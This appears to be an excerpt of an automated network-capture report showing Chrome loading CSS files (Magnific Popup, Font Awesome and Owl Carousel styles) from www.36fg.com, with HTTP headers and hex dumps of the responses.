                                                        2025-03-15 00:17:54 UTC1369INData Raw: 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6f 70 61 63 69 74 79 3a 20 30 2e 36 35 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 20 30 20 31 38 70 78 20 31 30 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 42 61 73 6b 65 72 76 69 6c 6c 65 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 20 7d 0a 20 20 2e 6d 66 70 2d 63 6c 6f 73 65 3a 68 6f 76 65 72 2c 0a 20 20 2e 6d 66 70 2d 63 6c 6f 73 65 3a 66 6f 63 75 73 20 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 20 7d 0a 20 20 2e 6d 66 70
                                                        Data Ascii: xt-decoration: none; text-align: center; opacity: 0.65; padding: 0 0 18px 10px; color: #FFF; font-style: normal; font-size: 28px; font-family: Arial, Baskerville, monospace; } .mfp-close:hover, .mfp-close:focus { opacity: 1; } .mfp
                                                        2025-03-15 00:17:54 UTC1369INData Raw: 70 2d 61 72 72 6f 77 2d 6c 65 66 74 20 7b 0a 20 20 6c 65 66 74 3a 20 30 3b 20 7d 0a 20 20 2e 6d 66 70 2d 61 72 72 6f 77 2d 6c 65 66 74 3a 61 66 74 65 72 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 20 31 37 70 78 20 73 6f 6c 69 64 20 23 46 46 46 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 31 70 78 3b 20 7d 0a 20 20 2e 6d 66 70 2d 61 72 72 6f 77 2d 6c 65 66 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 20 32 37 70 78 20 73 6f 6c 69 64 20 23 33 46 33 46 33 46 3b 20 7d 0a 0a 2e 6d 66 70 2d 61 72 72 6f 77 2d 72 69 67 68 74 20 7b 0a 20 20 72 69 67 68 74 3a 20 30 3b 20 7d 0a 20 20 2e 6d 66 70 2d 61 72 72 6f 77 2d 72 69 67 68
                                                        Data Ascii: p-arrow-left { left: 0; } .mfp-arrow-left:after { border-right: 17px solid #FFF; margin-left: 31px; } .mfp-arrow-left:before { margin-left: 25px; border-right: 27px solid #3F3F3F; }.mfp-arrow-right { right: 0; } .mfp-arrow-righ
                                                        2025-03-15 00:17:54 UTC1369INData Raw: 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 38 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 36 29 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 34 34 34 3b 20 7d 0a 20 20 2e 6d 66 70 2d 66 69 67 75 72 65 20 73 6d 61 6c 6c 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 42 44 42 44 42 44 3b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 34 70 78 3b 20 7d 0a 20 20 2e 6d 66 70 2d 66 69 67 75 72 65 20 66 69 67 75 72 65 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 20 7d 0a 0a 2e 6d 66 70 2d 62 6f 74 74 6f 6d 2d 62 61 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 33 36 70 78 3b 0a 20
                                                        Data Ascii: box-shadow: 0 0 8px rgba(0, 0, 0, 0.6); background: #444; } .mfp-figure small { color: #BDBDBD; display: block; font-size: 12px; line-height: 14px; } .mfp-figure figure { margin: 0; }.mfp-bottom-bar { margin-top: -36px;
                                                        2025-03-15 00:17:54 UTC575INData Raw: 6d 66 70 2d 69 6d 67 2d 6d 6f 62 69 6c 65 20 2e 6d 66 70 2d 63 6c 6f 73 65 20 7b 0a 20 20 20 20 74 6f 70 3a 20 30 3b 0a 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 33 35 70 78 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 33 35 70 78 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 35 70 78 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 36 29 3b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 20 7d 0a 0a 40 6d 65 64 69 61 20 61 6c 6c 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 30 30 70 78 29 20 7b 0a 20 20 2e 6d 66
                                                        Data Ascii: mfp-img-mobile .mfp-close { top: 0; right: 0; width: 35px; height: 35px; line-height: 35px; background: rgba(0, 0, 0, 0.6); position: fixed; text-align: center; padding: 0; } }@media all and (max-width: 900px) { .mf


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.549736104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:54 UTC631OUTGET /static/css/fontawesome-all.min.css HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://www.36fg.com/tp-Related/18104.html
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:54 UTC989INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:54 GMT
                                                        Content-Type: text/css
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        last-modified: Fri, 09 Jul 2021 02:03:30 GMT
                                                        vary: Accept-Encoding
                                                        etag: W/"60e7ae72-78d1"
                                                        expires: Sat, 15 Mar 2025 04:16:24 GMT
                                                        Cache-Control: max-age=43200
                                                        strict-transport-security: max-age=31536000
                                                        CF-Cache-Status: HIT
                                                        Age: 28895
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pH9ZbxyWgcxYhaQNknffgpLzLj1goQJyk%2B49Fu%2BpZNopoP3Kbrb%2FvH3%2F%2FFTXlxa7gez2cS48OBaan5g0SIJ9dhlDZNOuFwHwr09gOWILDz8PEbUi9lThfH5sLnQHo3Y%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d49b4b077cf9-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1944&min_rtt=1926&rtt_var=759&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1203&delivery_rate=1408586&cwnd=222&unsent_bytes=0&cid=77fe75f3dc00cfa7&ts=158&x=0"
                                                        2025-03-15 00:17:54 UTC380INData Raw: 37 38 64 31 0d 0a ef bb bf 2f 2a 21 0a 20 2a 20 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 34 2e 37 2e 30 20 62 79 20 40 64 61 76 65 67 61 6e 64 79 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 20 2d 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 0a 20 2a 20 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 2f 6c 69 63 65 6e 73 65 20 28 46 6f 6e 74 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 53 53 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 46 6f 6e 74 41 77 65 73 6f 6d 65 27 3b 73 72 63 3a 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 65 6f 74 27 29 3b
                                                        Data Ascii: 78d1/*! * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License) */@font-face{font-family:'FontAwesome';src:url('../fonts/fontawesome-webfont.eot');
                                                        2025-03-15 00:17:54 UTC1369INData Raw: 66 32 27 29 2c 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 77 6f 66 66 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 2c 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 74 74 66 27 29 20 66 6f 72 6d 61 74 28 27 74 72 75 65 74 79 70 65 27 29 2c 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 73 76 67 27 29 20 66 6f 72 6d 61 74 28 27 73 76 67 27 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 7d 2e 66 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 3a 6e 6f 72 6d 61 6c 20 6e 6f 72 6d 61 6c 20
                                                        Data Ascii: f2'),url('../fonts/fontawesome-webfont.woff') format('woff'),url('../fonts/fontawesome-webfont.ttf') format('truetype'),url('../fonts/fontawesome-webfont.svg') format('svg');font-weight:normal;font-style:normal}.fa{display:inline-block;font:normal normal
                                                        2025-03-15 00:17:54 UTC1369INData Raw: 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 31 30 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 35 39 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 35 39 64 65 67 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 73 70 69 6e 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 31 30 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 35 39 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 35 39 64 65 67 29 7d 7d 2e 66 61 2d 72 6f 74 61 74 65 2d 39 30 7b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f
                                                        Data Ascii: ransform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}.fa-rotate-90{-ms-filter:"pro
                                                        2025-03-15 00:17:54 UTC1369INData Raw: 6c 75 74 65 3b 6c 65 66 74 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 66 61 2d 73 74 61 63 6b 2d 31 78 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 2e 66 61 2d 73 74 61 63 6b 2d 32 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 7d 2e 66 61 2d 69 6e 76 65 72 73 65 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 66 61 2d 67 6c 61 73 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30 30 22 7d 2e 66 61 2d 6d 75 73 69 63 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30 31 22 7d 2e 66 61 2d 73 65 61 72 63 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30 32 22 7d 2e 66 61 2d 65 6e 76 65 6c 6f 70 65 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22
                                                        Data Ascii: lute;left:0;width:100%;text-align:center}.fa-stack-1x{line-height:inherit}.fa-stack-2x{font-size:2em}.fa-inverse{color:#fff}.fa-glass:before{content:"\f000"}.fa-music:before{content:"\f001"}.fa-search:before{content:"\f002"}.fa-envelope-o:before{content:"
                                                        2025-03-15 00:17:54 UTC1369INData Raw: 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 34 22 7d 2e 66 61 2d 68 65 61 64 70 68 6f 6e 65 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 35 22 7d 2e 66 61 2d 76 6f 6c 75 6d 65 2d 6f 66 66 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 36 22 7d 2e 66 61 2d 76 6f 6c 75 6d 65 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 37 22 7d 2e 66 61 2d 76 6f 6c 75 6d 65 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 38 22 7d 2e 66 61 2d 71 72 63 6f 64 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 39 22 7d 2e 66 61 2d 62 61 72 63 6f 64 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 61 22 7d 2e 66 61 2d 74 61 67 3a 62 65 66 6f 72 65 7b 63
                                                        Data Ascii: e{content:"\f024"}.fa-headphones:before{content:"\f025"}.fa-volume-off:before{content:"\f026"}.fa-volume-down:before{content:"\f027"}.fa-volume-up:before{content:"\f028"}.fa-qrcode:before{content:"\f029"}.fa-barcode:before{content:"\f02a"}.fa-tag:before{c
                                                        2025-03-15 00:17:54 UTC1369INData Raw: 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 39 22 7d 2e 66 61 2d 62 61 63 6b 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 61 22 7d 2e 66 61 2d 70 6c 61 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 62 22 7d 2e 66 61 2d 70 61 75 73 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 63 22 7d 2e 66 61 2d 73 74 6f 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 64 22 7d 2e 66 61 2d 66 6f 72 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 65 22 7d 2e 66 61 2d 66 61 73 74 2d 66 6f 72 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 35 30 22 7d 2e 66 61 2d 73 74 65 70 2d 66 6f 72 77 61 72 64 3a 62 65
                                                        Data Ascii: ward:before{content:"\f049"}.fa-backward:before{content:"\f04a"}.fa-play:before{content:"\f04b"}.fa-pause:before{content:"\f04c"}.fa-stop:before{content:"\f04d"}.fa-forward:before{content:"\f04e"}.fa-fast-forward:before{content:"\f050"}.fa-step-forward:be
                                                        2025-03-15 00:17:54 UTC1369INData Raw: 37 30 22 7d 2e 66 61 2d 77 61 72 6e 69 6e 67 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 74 72 69 61 6e 67 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 31 22 7d 2e 66 61 2d 70 6c 61 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 32 22 7d 2e 66 61 2d 63 61 6c 65 6e 64 61 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 33 22 7d 2e 66 61 2d 72 61 6e 64 6f 6d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 34 22 7d 2e 66 61 2d 63 6f 6d 6d 65 6e 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 35 22 7d 2e 66 61 2d 6d 61 67 6e 65 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 36 22 7d 2e 66 61 2d 63 68 65 76 72 6f 6e 2d
                                                        Data Ascii: 70"}.fa-warning:before,.fa-exclamation-triangle:before{content:"\f071"}.fa-plane:before{content:"\f072"}.fa-calendar:before{content:"\f073"}.fa-random:before{content:"\f074"}.fa-comment:before{content:"\f075"}.fa-magnet:before{content:"\f076"}.fa-chevron-
                                                        2025-03-15 00:17:54 UTC1369INData Raw: 73 71 75 61 72 65 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 36 22 7d 2e 66 61 2d 62 6f 6f 6b 6d 61 72 6b 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 37 22 7d 2e 66 61 2d 70 68 6f 6e 65 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 38 22 7d 2e 66 61 2d 74 77 69 74 74 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 39 22 7d 2e 66 61 2d 66 61 63 65 62 6f 6f 6b 2d 66 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 66 61 63 65 62 6f 6f 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 61 22 7d 2e 66 61 2d 67 69 74 68 75 62 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 62 22 7d 2e 66 61 2d 75 6e 6c 6f 63 6b 3a 62 65 66 6f 72 65 7b
                                                        Data Ascii: square-o:before{content:"\f096"}.fa-bookmark-o:before{content:"\f097"}.fa-phone-square:before{content:"\f098"}.fa-twitter:before{content:"\f099"}.fa-facebook-f:before,.fa-facebook:before{content:"\f09a"}.fa-github:before{content:"\f09b"}.fa-unlock:before{
                                                        2025-03-15 00:17:54 UTC1369INData Raw: 79 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 37 22 7d 2e 66 61 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 38 22 7d 2e 66 61 2d 6e 61 76 69 63 6f 6e 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 72 65 6f 72 64 65 72 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 62 61 72 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 39 22 7d 2e 66 61 2d 6c 69 73 74 2d 75 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 61 22 7d 2e 66 61 2d 6c 69 73 74 2d 6f 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 62 22 7d 2e 66 61 2d 73 74 72 69 6b 65 74 68 72 6f 75 67 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 63 22 7d 2e 66 61 2d 75 6e 64 65 72 6c 69 6e 65
                                                        Data Ascii: y-o:before{content:"\f0c7"}.fa-square:before{content:"\f0c8"}.fa-navicon:before,.fa-reorder:before,.fa-bars:before{content:"\f0c9"}.fa-list-ul:before{content:"\f0ca"}.fa-list-ol:before{content:"\f0cb"}.fa-strikethrough:before{content:"\f0cc"}.fa-underline
                                                        2025-03-15 00:17:54 UTC1369INData Raw: 62 65 66 6f 72 65 2c 2e 66 61 2d 63 6c 69 70 62 6f 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 61 22 7d 2e 66 61 2d 6c 69 67 68 74 62 75 6c 62 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 62 22 7d 2e 66 61 2d 65 78 63 68 61 6e 67 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 63 22 7d 2e 66 61 2d 63 6c 6f 75 64 2d 64 6f 77 6e 6c 6f 61 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 64 22 7d 2e 66 61 2d 63 6c 6f 75 64 2d 75 70 6c 6f 61 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 65 22 7d 2e 66 61 2d 75 73 65 72 2d 6d 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 66 30 22 7d 2e 66 61 2d 73 74 65 74 68 6f 73 63 6f 70 65 3a 62 65 66
                                                        Data Ascii: before,.fa-clipboard:before{content:"\f0ea"}.fa-lightbulb-o:before{content:"\f0eb"}.fa-exchange:before{content:"\f0ec"}.fa-cloud-download:before{content:"\f0ed"}.fa-cloud-upload:before{content:"\f0ee"}.fa-user-md:before{content:"\f0f0"}.fa-stethoscope:bef


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.549739104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:54 UTC628OUTGET /static/css/owl.carousel.min.css HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://www.36fg.com/tp-Related/18104.html
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:54 UTC449INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:54 GMT
                                                        Content-Type: text/css
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Server: cloudflare
                                                        Last-Modified: Fri, 09 Jul 2021 02:03:30 GMT
                                                        Vary: Accept-Encoding
                                                        Etag: W/"60e7ae72-d24"
                                                        Expires: Sat, 15 Mar 2025 04:16:24 GMT
                                                        Cache-Control: max-age=43200
                                                        Strict-Transport-Security: max-age=31536000
                                                        Cf-Cache-Status: HIT
                                                        Age: 28896
                                                        CF-RAY: 9207d49b5ad732c7-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-15 00:17:54 UTC920INData Raw: 64 32 34 0d 0a ef bb bf 2f 2a 2a 0a 20 2a 20 4f 77 6c 20 43 61 72 6f 75 73 65 6c 20 76 32 2e 33 2e 34 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 33 2d 32 30 31 38 20 44 61 76 69 64 20 44 65 75 74 73 63 68 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 3a 20 53 45 45 20 4c 49 43 45 4e 53 45 20 49 4e 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 4f 77 6c 43 61 72 6f 75 73 65 6c 32 2f 4f 77 6c 43 61 72 6f 75 73 65 6c 32 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 0a 20 2a 2f 0a 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 2c 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 20 2e 6f 77 6c 2d 69 74 65 6d 7b 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 70 6f
                                                        Data Ascii: d24/** * Owl Carousel v2.3.4 * Copyright 2013-2018 David Deutsch * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE */.owl-carousel,.owl-carousel .owl-item{-webkit-tap-highlight-color:transparent;po
                                                        2025-03-15 00:17:54 UTC1369INData Raw: 20 2e 6f 77 6c 2d 69 74 65 6d 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 66 61 63 65 2d 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 2d 77 65 62 6b 69 74 2d 74 6f 75 63 68 2d 63 61 6c 6c 6f 75 74 3a 6e 6f 6e 65 7d 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 20 2e 6f 77 6c 2d 69 74 65 6d 20 69 6d 67 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 20 2e 6f 77 6c 2d 64 6f 74 73 2e 64 69 73 61 62 6c 65 64 2c 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 20 2e 6f 77 6c 2d 6e 61 76 2e 64 69 73 61 62 6c 65 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 6e 6f 2d 6a 73 20 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 2c 2e 6f 77 6c
                                                        Data Ascii: .owl-item{min-height:1px;float:left;-webkit-backface-visibility:hidden;-webkit-touch-callout:none}.owl-carousel .owl-item img{display:block;width:100%}.owl-carousel .owl-dots.disabled,.owl-carousel .owl-nav.disabled{display:none}.no-js .owl-carousel,.owl
